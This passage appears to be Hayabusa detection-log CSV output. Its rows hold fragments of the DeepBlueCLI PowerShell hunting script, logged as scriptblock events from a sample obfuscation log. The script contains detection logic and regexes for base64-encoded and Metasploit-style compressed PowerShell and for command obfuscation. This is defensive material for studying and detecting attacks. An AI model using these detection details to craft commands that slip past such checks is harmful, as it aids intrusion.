0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message 
is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ #$eventxml.Event.EventData.Data[1].""#text"" $pscommand=$eventXML.Event.EventData.Data[4].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength 
$regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. 
# Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} """,../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:37.559 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. 
.Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. 
$username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... 
service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ #$eventxml.Event.EventData.Data[1].""#text"" $pscommand=$eventXML.Event.EventData.Data[4].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. 
Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} """,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:37.559 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. 
Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded 
function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. 
Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . 
Main",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:37.559 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not 
reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. 
# If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . 
Main",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:37.559 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:37.562 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. 
$username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... 
service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove 